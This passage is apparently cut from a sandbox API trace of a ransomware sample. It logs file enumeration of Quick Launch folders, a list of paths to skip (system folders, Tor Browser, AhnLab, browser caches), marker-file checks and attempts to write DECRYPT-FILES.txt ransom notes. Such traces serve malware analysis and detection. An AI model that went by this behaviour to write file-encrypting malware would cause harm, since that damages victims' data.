Desktop.lnk", lpString2="boot.ini") returned 1 [0186.332] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="desktop.ini") returned 1 [0186.332] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat") returned 1 [0186.332] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="iconcache.db") returned 1 [0186.333] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootsect.bak") returned 1 [0186.333] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat.log") returned 1 [0186.333] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="thumbs.db") returned -1 [0186.333] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0186.333] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0186.333] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.333] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0186.333] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0186.333] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0186.333] lstrcatW (in: lpString1="User Pinned", lpString2="\\" | out: lpString1="User Pinned\\") returned="User Pinned\\" [0186.333] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Program Files") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch=":\\Windows") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Games\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\All Users") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="AhnLab") returned 0x0 [0186.333] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.333] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0186.333] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.333] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\0a16c9.tmp") returned 97 [0186.333] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.340] GetLastError () returned 0x5 [0186.340] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0186.340] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.340] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt") returned 104 [0186.340] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.341] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0186.341] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0186.342] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.342] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.342] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.342] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.342] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.342] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0186.342] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0186.342] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0186.343] lstrcatW (in: lpString1="ImplicitAppShortcuts", lpString2="\\" | out: lpString1="ImplicitAppShortcuts\\") returned="ImplicitAppShortcuts\\" [0186.343] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Program Files") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch=":\\Windows") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Games\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.343] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\All Users") returned 0x0 [0186.344] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.344] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.344] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.344] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="AhnLab") returned 0x0 [0186.344] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.344] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0186.344] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.344] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\0a16c9.tmp") returned 118 [0186.344] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.344] GetLastError () returned 0x5 [0186.344] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0186.344] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.344] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt") returned 125 [0186.345] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.345] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0186.345] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0186.345] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.345] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.345] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.345] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.345] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.345] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.345] CloseHandle (hObject=0xffffffff) returned 0 [0186.345] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0186.345] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0186.345] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0186.345] lstrcatW (in: lpString1="TaskBar", lpString2="\\" | out: lpString1="TaskBar\\") returned="TaskBar\\" [0186.345] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0186.345] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Program Files") returned 0x0 [0186.345] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch=":\\Windows") returned 0x0 [0186.345] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Games\\") returned 0x0 [0186.345] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\All Users") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="AhnLab") returned 0x0 [0186.346] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.346] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0186.346] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.346] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\0a16c9.tmp") returned 105 [0186.346] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.353] GetLastError () returned 0x5 [0186.353] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0186.353] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.353] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt") returned 112 [0186.353] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.355] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 94 [0186.355] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0186.355] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.355] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.355] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.355] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.355] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 